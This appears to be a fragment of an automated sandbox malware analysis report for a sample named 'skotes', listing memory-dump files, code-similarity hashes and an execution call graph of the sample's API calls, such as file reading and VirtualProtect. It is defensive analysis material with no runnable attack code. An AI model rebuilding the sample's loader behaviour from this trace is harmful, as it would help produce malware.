                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                                              • String ID: v
                                                                                                                                                                                                                                                              • API String ID: 3213747228-1361604894
                                                                                                                                                                                                                                                              • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                              • Instruction ID: 163fdb54c6cba91d0546af17efc3c13ad04d3eca3979e4ae30cac8b01d202eab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDB122729042869FDB158F68C8817BEBBE6EF45384F24916BE955FB342D6348D03CB60
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Mtx_unlock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1418687624-0
                                                                                                                                                                                                                                                              • Opcode ID: e01cb01ad53452e23bb0bf032051fdf9bd0ac723b4240d9b955777e220304ac1
                                                                                                                                                                                                                                                              • Instruction ID: 36c64e9f61626635e577c28db3316d81de933305ab451aba2af971967b39d51e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e01cb01ad53452e23bb0bf032051fdf9bd0ac723b4240d9b955777e220304ac1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23A1C170A056059FDB20DBB4C945B9BB7E8FF1A318F145129F815FB251EB31EA04CB91

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:4.4%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0.6%
                                                                                                                                                                                                                                                              Signature Coverage:0.9%
                                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                                              Total number of Limit Nodes:22
                                                                                                                                                                                                                                                              execution_graph 15108 2d422c 15109 2d424e 15108->15109 15113 2d4263 15108->15113 15114 2d43df 15109->15114 15117 2d43f9 15114->15117 15119 2d4448 15114->15119 15115 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15116 2d4253 15115->15116 15116->15113 15120 2dc53d 15116->15120 15118 2dc578 69 API calls 15117->15118 15117->15119 15118->15119 15119->15115 15121 2dc55d 15120->15121 15122 2dc548 15120->15122 15121->15122 15124 2dc564 15121->15124 15123 2dad6d __strnicoll 14 API calls 15122->15123 15125 2dc54d 15123->15125 15130 2dae1d 15124->15130 15127 2db458 __strnicoll 29 API calls 15125->15127 15129 2dc558 15127->15129 15128 2dc573 15128->15113 15129->15113 15131 2dae30 _Fputc 15130->15131 15134 2db096 15131->15134 15133 2dae45 _Fputc 15133->15128 15136 2db0a2 ___scrt_is_nonwritable_in_current_image 15134->15136 15135 2db0a8 15137 2db601 _Fputc 29 API calls 15135->15137 15136->15135 15139 2db0eb 15136->15139 15138 2db0c3 15137->15138 15138->15133 15145 2d875f EnterCriticalSection 15139->15145 15141 2db0f7 15146 2dafaa 15141->15146 15143 2db10d 15157 2db136 15143->15157 15145->15141 15147 2dafbd 15146->15147 15148 2dafd0 15146->15148 15147->15143 15160 2daed1 15148->15160 15150 2daff3 15151 2db081 15150->15151 15152 2db00e 15150->15152 15164 2e424d 15150->15164 15151->15143 15153 2dbc27 ___scrt_uninitialize_crt 64 API calls 15152->15153 15155 2db021 15153->15155 15178 2e4033 15155->15178 15229 2d8773 LeaveCriticalSection 15157->15229 15159 2db13e 15159->15138 15161 2daee2 15160->15161 15163 2daf3a 15160->15163 15161->15163 15181 2e3ff3 15161->15181 15163->15150 15165 2e461f 15164->15165 15166 2e462e 15165->15166 15167 2e4656 15165->15167 15168 2db601 _Fputc 29 API calls 15166->15168 15169 2e0efc _Fputc 29 API calls 15167->15169 15177 2e4649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15168->15177 15170 2e465f 15169->15170 15191 2e4051 15170->15191 15173 2e4709 15194 2e42a9 15173->15194 15175 2e4720 15175->15177 15206 2e4454 15175->15206 15177->15152 15179 2e4194 __fread_nolock 31 API calls 15178->15179 15180 2e404c 15179->15180 15180->15151 15182 2e4007 _Fputc 15181->15182 15185 2e4194 15182->15185 15184 2e401c _Fputc 15184->15163 15186 2e4cb0 _Fputc 29 API calls 15185->15186 15187 2e41a6 15186->15187 15188 2e41c2 SetFilePointerEx 15187->15188 15190 2e41ae __fread_nolock 15187->15190 15189 2e41da GetLastError 15188->15189 15188->15190 15189->15190 15190->15184 15213 2e406f 15191->15213 15195 2e42b8 _Fputc 15194->15195 15196 2e0efc _Fputc 29 API calls 15195->15196 15197 2e42d4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15196->15197 15200 2e4051 33 API calls 15197->15200 15205 2e42e0 15197->15205 15198 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15199 2e4452 15198->15199 15199->15177 15201 2e4334 15200->15201 15202 2e4366 ReadFile 15201->15202 15201->15205 15203 2e438d 15202->15203 15202->15205 15204 2e4051 33 API calls 15203->15204 15204->15205 15205->15198 15207 2e0efc _Fputc 29 API calls 15206->15207 15208 2e4467 15207->15208 15209 2e4051 33 API calls 15208->15209 15212 2e44b1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15208->15212 15210 2e450e 15209->15210 15211 2e4051 33 API calls 15210->15211 15210->15212 15211->15212 15212->15177 15214 2e407b ___scrt_is_nonwritable_in_current_image 15213->15214 15215 2e40be 15214->15215 15216 2e4104 15214->15216 15223 2e406a 15214->15223 15217 2db601 _Fputc 29 API calls 15215->15217 15224 2e4ef9 EnterCriticalSection 15216->15224 15217->15223 15219 2e410a 15220 2e412b 15219->15220 15221 2e4194 __fread_nolock 31 API calls 15219->15221 15225 2e418c 15220->15225 15221->15220 15223->15173 15223->15175 15223->15177 15224->15219 15228 2e4f1c LeaveCriticalSection 15225->15228 15227 2e4192 15227->15223 15228->15227 15229->15159 17197 2d430a 17198 2d4342 17197->17198 17199 2d4313 17197->17199 17199->17198 17202 2dbb66 17199->17202 17201 2d4335 17203 2dbb78 17202->17203 17206 2dbb81 ___scrt_uninitialize_crt 17202->17206 17204 2dbce4 ___scrt_uninitialize_crt 68 API calls 17203->17204 17205 2dbb7e 17204->17205 17205->17201 17207 2dbb90 17206->17207 17210 2dbe69 17206->17210 17207->17201 17211 2dbe75 ___scrt_is_nonwritable_in_current_image 17210->17211 17218 2d875f EnterCriticalSection 17211->17218 17213 2dbe83 17214 2dbbc2 ___scrt_uninitialize_crt 68 API calls 17213->17214 17215 2dbe94 17214->17215 17219 2dbebd 17215->17219 17218->17213 17222 2d8773 LeaveCriticalSection 17219->17222 17221 2dbbb7 17221->17201 17222->17221 15915 2d3e04 15917 2d3e10 __EH_prolog3_GS 15915->15917 15919 2d3e79 15917->15919 15920 2d3e60 15917->15920 15924 2d3e2a 15917->15924 15932 2dbec9 15919->15932 15929 2d35ba 15920->15929 15956 2d535e 15924->15956 15925 2d3e98 15925->15924 15927 2dbec9 45 API calls 15925->15927 15928 2d3f6d 15925->15928 15952 2d33ee 15925->15952 15927->15925 15928->15924 15959 2dcf47 15928->15959 15930 2dbec9 45 API calls 15929->15930 15931 2d35c5 15930->15931 15931->15924 15933 2dbed5 ___scrt_is_nonwritable_in_current_image 15932->15933 15934 2dbedf 15933->15934 15935 2dbef7 15933->15935 15937 2dad6d __strnicoll 14 API calls 15934->15937 15972 2d875f EnterCriticalSection 15935->15972 15939 2dbee4 15937->15939 15938 2dbf02 15941 2e0efc _Fputc 29 API calls 15938->15941 15944 2dbf1a 15938->15944 15940 2db458 __strnicoll 29 API calls 15939->15940 15951 2dbeef _Fputc 15940->15951 15941->15944 15942 2dbfaa 15973 2dbfe2 15942->15973 15943 2dbf82 15945 2dad6d __strnicoll 14 API calls 15943->15945 15944->15942 15944->15943 15947 2dbf87 15945->15947 15949 2db458 __strnicoll 29 API calls 15947->15949 15948 2dbfb0 15983 2dbfda 15948->15983 15949->15951 15951->15925 15953 2d3422 15952->15953 15955 2d33fe 15952->15955 16145 2d46df 15953->16145 15955->15925 15957 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15956->15957 15958 2d5368 15957->15958 15958->15958 15960 2dcf53 ___scrt_is_nonwritable_in_current_image 15959->15960 15961 2dcf6f 15960->15961 15962 2dcf5a 15960->15962 16160 2d875f EnterCriticalSection 15961->16160 15963 2dad6d __strnicoll 14 API calls 15962->15963 15965 2dcf5f 15963->15965 15967 2db458 __strnicoll 29 API calls 15965->15967 15966 2dcf79 16161 2dcfba 15966->16161 15971 2dcf6a 15967->15971 15971->15928 15972->15938 15974 2dbfee 15973->15974 15975 2dc003 15973->15975 15976 2dad6d __strnicoll 14 API calls 15974->15976 15977 2dc012 15975->15977 15986 2e5d52 15975->15986 15978 2dbff3 15976->15978 15977->15948 15980 2db458 __strnicoll 29 API calls 15978->15980 15982 2dbffe 15980->15982 15982->15948 16144 2d8773 LeaveCriticalSection 15983->16144 15985 2dbfe0 15985->15951 15987 2e5d5d 15986->15987 15988 2e5d6a 15987->15988 15992 2e5d82 15987->15992 15989 2dad6d __strnicoll 14 API calls 15988->15989 15990 2e5d6f 15989->15990 15991 2db458 __strnicoll 29 API calls 15990->15991 16001 2dc00f 15991->16001 15993 2e5de1 15992->15993 15992->16001 16007 2e7d00 15992->16007 15994 2e0efc _Fputc 29 API calls 15993->15994 15996 2e5dfa 15994->15996 16012 2e6144 15996->16012 15999 2e0efc _Fputc 29 API calls 16000 2e5e33 15999->16000 16000->16001 16002 2e0efc _Fputc 29 API calls 16000->16002 16001->15948 16003 2e5e41 16002->16003 16003->16001 16004 2e0efc _Fputc 29 API calls 16003->16004 16005 2e5e4f 16004->16005 16006 2e0efc _Fputc 29 API calls 16005->16006 16006->16001 16008 2df807 __strnicoll 14 API calls 16007->16008 16009 2e7d1d 16008->16009 16010 2de4f7 ___free_lconv_mon 14 API calls 16009->16010 16011 2e7d27 16010->16011 16011->15993 16013 2e6150 ___scrt_is_nonwritable_in_current_image 16012->16013 16014 2e6158 16013->16014 16018 2e6173 16013->16018 16015 2dad80 __dosmaperr 14 API calls 16014->16015 16016 2e615d 16015->16016 16019 2dad6d __strnicoll 14 API calls 16016->16019 16017 2e618a 16020 2dad80 __dosmaperr 14 API calls 16017->16020 16018->16017 16021 2e61c5 16018->16021 16025 2e5e02 16019->16025 16022 2e618f 16020->16022 16023 2e61ce 16021->16023 16024 2e61e3 16021->16024 16027 2dad6d __strnicoll 14 API calls 16022->16027 16028 2dad80 __dosmaperr 14 API calls 16023->16028 16042 2e4ef9 EnterCriticalSection 16024->16042 16025->15999 16025->16001 16030 2e6197 16027->16030 16031 2e61d3 16028->16031 16029 2e61e9 16032 2e621d 16029->16032 16033 2e6208 16029->16033 16036 2db458 __strnicoll 29 API calls 16030->16036 16034 2dad6d __strnicoll 14 API calls 16031->16034 16043 2e625d 16032->16043 16035 2dad6d __strnicoll 14 API calls 16033->16035 16034->16030 16038 2e620d 16035->16038 16036->16025 16040 2dad80 __dosmaperr 14 API calls 16038->16040 16039 2e6218 16106 2e6255 16039->16106 16040->16039 16042->16029 16044 2e626f 16043->16044 16045 2e6287 16043->16045 16046 2dad80 __dosmaperr 14 API calls 16044->16046 16047 2e65c9 16045->16047 16052 2e62ca 16045->16052 16048 2e6274 16046->16048 16049 2dad80 __dosmaperr 14 API calls 16047->16049 16050 2dad6d __strnicoll 14 API calls 16048->16050 16051 2e65ce 16049->16051 16057 2e627c 16050->16057 16053 2dad6d __strnicoll 14 API calls 16051->16053 16054 2e62d5 16052->16054 16052->16057 16059 2e6305 16052->16059 16055 2e62e2 16053->16055 16056 2dad80 __dosmaperr 14 API calls 16054->16056 16060 2db458 __strnicoll 29 API calls 16055->16060 16058 2e62da 16056->16058 16057->16039 16061 2dad6d __strnicoll 14 API calls 16058->16061 16062 2e631e 16059->16062 16063 2e632b 16059->16063 16064 2e6359 16059->16064 16060->16057 16061->16055 16062->16063 16071 2e6347 16062->16071 16065 2dad80 __dosmaperr 14 API calls 16063->16065 16067 2de531 __strnicoll 15 API calls 16064->16067 16066 2e6330 16065->16066 16069 2dad6d __strnicoll 14 API calls 16066->16069 16068 2e636a 16067->16068 16072 2de4f7 ___free_lconv_mon 14 API calls 16068->16072 16073 2e6337 16069->16073 16109 2e8994 16071->16109 16075 2e6373 16072->16075 16076 2db458 __strnicoll 29 API calls 16073->16076 16074 2e64a5 16077 2e6519 16074->16077 16081 2e64be GetConsoleMode 16074->16081 16078 2de4f7 ___free_lconv_mon 14 API calls 16075->16078 16080 2e6342 __fread_nolock 16076->16080 16079 2e651d ReadFile 16077->16079 16082 2e637a 16078->16082 16083 2e6535 16079->16083 16084 2e6591 GetLastError 16079->16084 16092 2de4f7 ___free_lconv_mon 14 API calls 16080->16092 16081->16077 16085 2e64cf 16081->16085 16086 2e639f 16082->16086 16087 2e6384 16082->16087 16083->16084 16090 2e650e 16083->16090 16088 2e659e 16084->16088 16089 2e64f5 16084->16089 16085->16079 16091 2e64d5 ReadConsoleW 16085->16091 16095 2e3ff3 __fread_nolock 31 API calls 16086->16095 16093 2dad6d __strnicoll 14 API calls 16087->16093 16094 2dad6d __strnicoll 14 API calls 16088->16094 16089->16080 16097 2dad93 __dosmaperr 14 API calls 16089->16097 16090->16080 16102 2e655a 16090->16102 16103 2e6571 16090->16103 16091->16090 16096 2e64ef GetLastError 16091->16096 16092->16057 16098 2e6389 16093->16098 16099 2e65a3 16094->16099 16095->16071 16096->16089 16097->16080 16100 2dad80 __dosmaperr 14 API calls 16098->16100 16101 2dad80 __dosmaperr 14 API calls 16099->16101 16100->16080 16101->16080 16118 2e6666 16102->16118 16103->16080 16131 2e690a 16103->16131 16143 2e4f1c LeaveCriticalSection 16106->16143 16108 2e625b 16108->16025 16110 2e89ae 16109->16110 16111 2e89a1 16109->16111 16113 2e89ba 16110->16113 16114 2dad6d __strnicoll 14 API calls 16110->16114 16112 2dad6d __strnicoll 14 API calls 16111->16112 16115 2e89a6 16112->16115 16113->16074 16116 2e89db 16114->16116 16115->16074 16117 2db458 __strnicoll 29 API calls 16116->16117 16117->16115 16137 2e67bd 16118->16137 16120 2de57f __strnicoll MultiByteToWideChar 16121 2e677a 16120->16121 16125 2e6783 GetLastError 16121->16125 16128 2e66ae 16121->16128 16122 2e6708 16129 2e66c2 16122->16129 16130 2e3ff3 __fread_nolock 31 API calls 16122->16130 16123 2e66f8 16126 2dad6d __strnicoll 14 API calls 16123->16126 16127 2dad93 __dosmaperr 14 API calls 16125->16127 16126->16128 16127->16128 16128->16080 16129->16120 16130->16129 16132 2e6944 16131->16132 16133 2e69da ReadFile 16132->16133 16134 2e69d5 16132->16134 16133->16134 16135 2e69f7 16133->16135 16134->16080 16135->16134 16136 2e3ff3 __fread_nolock 31 API calls 16135->16136 16136->16134 16138 2e67f1 16137->16138 16139 2e6862 ReadFile 16138->16139 16140 2e667d 16138->16140 16139->16140 16141 2e687b 16139->16141 16140->16122 16140->16123 16140->16128 16140->16129 16141->16140 16142 2e3ff3 __fread_nolock 31 API calls 16141->16142 16142->16140 16143->16108 16144->15985 16146 2d4793 16145->16146 16147 2d4703 16145->16147 16148 2d1860 std::ios_base::_Init 31 API calls 16146->16148 16152 2d47f6 16147->16152 16149 2d4798 16148->16149 16151 2d4720 _Yarn _Deallocate 16151->15955 16153 2d4800 16152->16153 16154 2d4802 16152->16154 16153->16151 16155 2d480a 16154->16155 16156 2d4811 16154->16156 16158 2d186a std::ios_base::_Init 31 API calls 16155->16158 16157 2d2952 codecvt 16 API calls 16156->16157 16159 2d480f 16157->16159 16158->16159 16159->16151 16160->15966 16162 2dcfd2 16161->16162 16165 2dd042 16161->16165 16163 2e0efc _Fputc 29 API calls 16162->16163 16164 2dcfd8 16163->16164 16164->16165 16168 2dd02a 16164->16168 16166 2e7d00 __fread_nolock 14 API calls 16165->16166 16167 2dcf87 16165->16167 16166->16167 16172 2dcfb2 16167->16172 16169 2dad6d __strnicoll 14 API calls 16168->16169 16170 2dd02f 16169->16170 16171 2db458 __strnicoll 29 API calls 16170->16171 16171->16167 16175 2d8773 LeaveCriticalSection 16172->16175 16174 2dcfb8 16174->15971 16175->16174 13301 2d1614 GetPEB 13323 2d1098 13301->13323 13304 2d1828 13366 2d29c6 13304->13366 13305 2d1680 GetFileSize 13307 2d1804 CloseHandle 13305->13307 13308 2d1694 13305->13308 13307->13304 13310 2d169c ReadFile 13308->13310 13309 2d1836 13311 2d16b9 CloseHandle 13310->13311 13312 2d17fb 13310->13312 13316 2d16d0 _Yarn _Deallocate _strlen 13311->13316 13322 2d17f9 13311->13322 13312->13307 13314 2d1840 13373 2d1860 13314->13373 13316->13314 13317 2d1845 13316->13317 13316->13322 13348 2d186a 13316->13348 13354 2d2952 13316->13354 13375 2db468 13317->13375 13334 2d155c 13322->13334 13324 2d120e 13323->13324 13333 2d10c1 _Yarn _Deallocate _strlen 13323->13333 13325 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13324->13325 13326 2d1227 CreateFileA 13325->13326 13326->13304 13326->13305 13327 2d1231 13328 2d1860 std::ios_base::_Init 31 API calls 13327->13328 13329 2d1236 13328->13329 13330 2db468 std::ios_base::_Init 29 API calls 13329->13330 13330->13329 13331 2d186a std::ios_base::_Init 31 API calls 13331->13333 13332 2d2952 codecvt 16 API calls 13332->13333 13333->13324 13333->13327 13333->13329 13333->13331 13333->13332 13335 2d1098 31 API calls 13334->13335 13336 2d1582 FreeConsole 13335->13336 13380 2d123b 13336->13380 13339 2d123b 104 API calls 13340 2d15b9 13339->13340 13341 2d1098 31 API calls 13340->13341 13342 2d15cc VirtualProtect 13341->13342 13343 2d15dd 13342->13343 13344 2d15f1 ExitProcess 13342->13344 13345 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13343->13345 13346 2d15e7 13345->13346 13346->13304 13349 2d188b 13348->13349 13350 2d1873 13348->13350 14220 2d1890 13349->14220 13351 2d2952 codecvt 16 API calls 13350->13351 13353 2d187c 13351->13353 13353->13316 13356 2d2957 13354->13356 13355 2dc994 _Yarn 15 API calls 13355->13356 13356->13355 13357 2d2971 13356->13357 13358 2d8f08 codecvt 2 API calls 13356->13358 13359 2d2973 13356->13359 13357->13316 13358->13356 13360 2d4a6f codecvt 13359->13360 13362 2d297d Concurrency::cancel_current_task 13359->13362 13361 2d5aba CallUnexpected RaiseException 13360->13361 13363 2d4a8b 13361->13363 13364 2d5aba CallUnexpected RaiseException 13362->13364 13365 2d31cf 13364->13365 13367 2d29cf IsProcessorFeaturePresent 13366->13367 13368 2d29ce 13366->13368 13370 2d4b7e 13367->13370 13368->13309 14225 2d4c64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13370->14225 13372 2d4c61 13372->13309 14226 2d31d0 13373->14226 13376 2db6a7 __strnicoll 29 API calls 13375->13376 13377 2db477 13376->13377 13378 2db485 __Getctype 11 API calls 13377->13378 13379 2db484 13378->13379 13386 2d1263 13380->13386 13381 2d1355 13383 2d29c6 